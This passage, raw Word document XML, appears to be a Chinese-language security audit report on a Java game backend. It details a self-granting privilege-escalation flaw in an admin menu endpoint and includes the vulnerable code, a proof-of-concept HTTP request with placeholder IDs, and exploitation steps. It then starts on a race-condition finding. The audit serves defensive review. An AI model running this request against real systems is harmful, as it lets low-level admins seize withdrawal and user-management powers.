          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>admin_menu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表中存在，任意非超管管理员均可将该菜单权限写入自己账户，包括 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/withdrawManage/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（提现管理）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/userManage/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（用户管理）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/adminManage/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（管理员管理）等高权限菜单。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>正确的设计应当是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>普通管理员的自助操作最多只能设置其当前已拥有的菜单子集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（减权），或完全禁止自助修改，由超管统一授权。</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请求</w:t>
              <w:br/>
              <w:t xml:space="preserve"> └─ POST /menuManage/admin/{adminId}/menus</w:t>
              <w:br/>
              <w:t xml:space="preserve">     │   adminId        = 攻击者自身 adminId（合法，通过权限校验）</w:t>
              <w:br/>
              <w:t xml:space="preserve">     │   menuIds (body) = [&lt;任意存在的高权限菜单ID&gt;, ...]   ← 攻击者完全可控</w:t>
              <w:br/>
              <w:t xml:space="preserve">     │</w:t>
              <w:br/>
              <w:t xml:space="preserve">     ▼</w:t>
              <w:br/>
              <w:t>MenuManageController.saveAdminMenus()</w:t>
              <w:br/>
              <w:t xml:space="preserve">  权限校验：isSuper=false 且 adminId == currentAdminId → 放行  ← 校验逻辑缺陷，未限制可授菜单范围</w:t>
              <w:br/>
              <w:t xml:space="preserve">     │</w:t>
              <w:br/>
              <w:t xml:space="preserve">     ▼</w:t>
              <w:br/>
              <w:t>MenuManageService.saveAdminMenus(adminId, menuIds)</w:t>
              <w:br/>
              <w:t xml:space="preserve">  deleteByAdminUserId(adminId)   ← 先清空该账户所有菜单</w:t>
              <w:br/>
              <w:t xml:space="preserve">  existsById(menuId)             ← 仅判断菜单存在，未判断授权合法性</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  adminUserMenuRepository.save() ← 高权限菜单被写入攻击者账户</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入口：MenuManageController.java</w:t>
              <w:br/>
              <w:t>// adminId        : Long，来自 URL 路径参数，攻击者可设为自身 adminId</w:t>
              <w:br/>
              <w:t>// menuIds (body) : List&lt;Long&gt;，HTTP RequestBody，攻击者完全可控，可填入系统中任意存在的高权限菜单ID</w:t>
              <w:br/>
              <w:t>@PostMapping("/admin/{adminId}/menus")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; saveAdminMenus(</w:t>
              <w:br/>
              <w:t xml:space="preserve">        @PathVariable Long adminId,                                            // ← HTTP 可控入口（路径参数）</w:t>
              <w:br/>
              <w:t xml:space="preserve">        @RequestBody List&lt;Long&gt; menuIds,                                       // ← HTTP 可控入口（请求体），攻击者可填任意 menuId</w:t>
              <w:br/>
              <w:t xml:space="preserve">        @RequestAttribute(AdminAuthFilter.ATTR_ADMIN_ID) Long currentAdminId, // ← 由 AdminAuthFilter 注入，不可伪造</w:t>
              <w:br/>
              <w:t xml:space="preserve">        @RequestAttribute(AdminAuthFilter.ATTR_ADMIN_IS_SUPER) Boolean isSuper) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 仅校验"不能改别人的"，未校验"能给自己授哪些菜单"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!Boolean.TRUE.equals(isSuper) &amp;&amp; !adminId.equals(currentAdminId)) {   // ← 校验逻辑缺陷</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return ApiResponse.error(HttpStatus.FORBIDDEN.value(), "无权限修改其他管理员菜单");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // adminId == currentAdminId 时，携带任意 menuIds 直接放行进入 service</w:t>
              <w:br/>
              <w:t xml:space="preserve">    menuManageService.saveAdminMenus(adminId, menuIds);                        // ← 污点（menuIds）传入 service 层，无菜单范围限制</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service 层：MenuManageService.java</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void saveAdminMenus(Long adminUserId, List&lt;Long&gt; menuIds) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (adminUserRepository.findById(adminUserId).isEmpty()) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("管理员不存在");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    adminUserMenuRepository.deleteByAdminUserId(adminUserId);  // ← 先清空该账户全部菜单权限</w:t>
              <w:br/>
              <w:t xml:space="preserve">    adminUserMenuRepository.flush();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    Set&lt;Long&gt; distinctMenuIds = menuIds.stream</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>()</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .filter(Objects::nonNull)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .collect(Collectors.toCollection(LinkedHashSet::new));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (Long menuId : distinctMenuIds) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (adminMenuRepository.existsById(menuId)) {          // ← 漏洞点：仅验证菜单存在，不验证当前账户是否有权自授该菜单</w:t>
              <w:br/>
              <w:t xml:space="preserve">            AdminUserMenu um = new AdminUserMenu();</w:t>
              <w:br/>
              <w:t xml:space="preserve">            um.setAdminUserId(adminUserId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            um.setMenuId(menuId);                              // ← 任意高权限 menuId 被写入，实现提权</w:t>
              <w:br/>
              <w:t xml:space="preserve">            adminUserMenuRepository.save(um);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</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 xml:space="preserve">&gt; 前提：攻击者以普通管理员身份登录，获取有效 Bearer Token，自身 adminId 假设为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">；通过枚举或先查询菜单列表接口，获取到"提现管理"对应的 menuId（如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&lt;提现管理menuId&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）、"用户管理"对应的 menuId（如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&lt;用户管理menuId&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）等高权限菜单 ID。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 1：以自身 adminId 向自己写入所有高权限菜单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/menuManage/admin/42/menus HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者自身的合法管理员Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>[&lt;提现管理menuId&gt;, &lt;用户管理menuId&gt;, &lt;管理员管理menuId&gt;]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>预期响应：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{"code": 200, "message": "success"}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step 2：刷新登录或重新请求后，攻击者账户已具备上述高权限菜单的访问权限，可访问 `/withdrawManage/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/userManage/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`、`/adminManage/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>` 等原本无权访问的接口。**</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265"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者以受限普通管理员身份登录，获取有效 Token，确认自身 adminId（可从登录响应或个人信息接口获取）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="266"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">通过菜单查询接口（如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GET /menuManage/menus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，若存在）或已有的 UI 页面枚举出系统中所有 menuId。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>调用上述 POC，将目标高权限菜单 ID 列表写入自身账户。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="268"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">后续请求 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/withdrawManage/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/userManage/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/adminManage/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等管理接口，验证是否已获得访问权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="269"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>若系统存在"基于菜单权限的接口鉴权"（通常在 AdminAuthFilter 或 AOP 层），此步骤将直接绕过，攻击者可执行提现审核、修改用户余额、创建新管理员等高权限操作，造成资金损失或数据泄露。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="270"/>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，需要有效的管理后台账户（即使是权限最低的普通管理员账号）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="271"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：任意非超管管理员均可利用，无需特殊权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 📎 该 sink 另有 2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受影响调用链（3 条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="272"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MenuManageController.java.saveAdminMenus → MenuManageService.java.saveAdminMenus → AdminUserMenuRepository.java.deleteByAdminUserId</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="273"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MenuManageController.java.saveAdminMenus → MenuManageService.java.saveAdminMenus → AdminUserMenu.java.setAdminUserId</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="274"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MenuManageController.java.saveAdminMenus → MenuManageService.java.saveAdminMenus → AdminUserMenu.java.setMenuId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audit_m143_458_saveAdminMenus_ctrl-path1of5.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m143_463_saveAdminMenus_ctrl-path2of5.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m143_468_saveAdminMenus_ctrl-path3of5.md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：MinerService.java#purchase</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_14" w:id="14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞13：矿机坑位占用 TOCTOU 竞态条件——并发请求突破坑位容量限制，非法扩充算力</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="27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：矿机坑位占用 TOCTOU（Time-of-Check/Time-of-Use）竞态条件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="27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src/main/java/com/gameBack/mjservice/service/MinerService.java:purchase</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="27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业务逻辑绕过 / 资金安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="27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7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：已登录普通用户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purchase()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法的坑位占用检查（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>canPlaceInSlot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）与矿机落库（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userMinerRepository.save(miner)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）之间存在未受保护的时间窗口。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>canPlaceInSlot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 使用普通 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（无 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）判断坑位是否已被占用，而 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 行锁（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）是在坑位检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>之后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
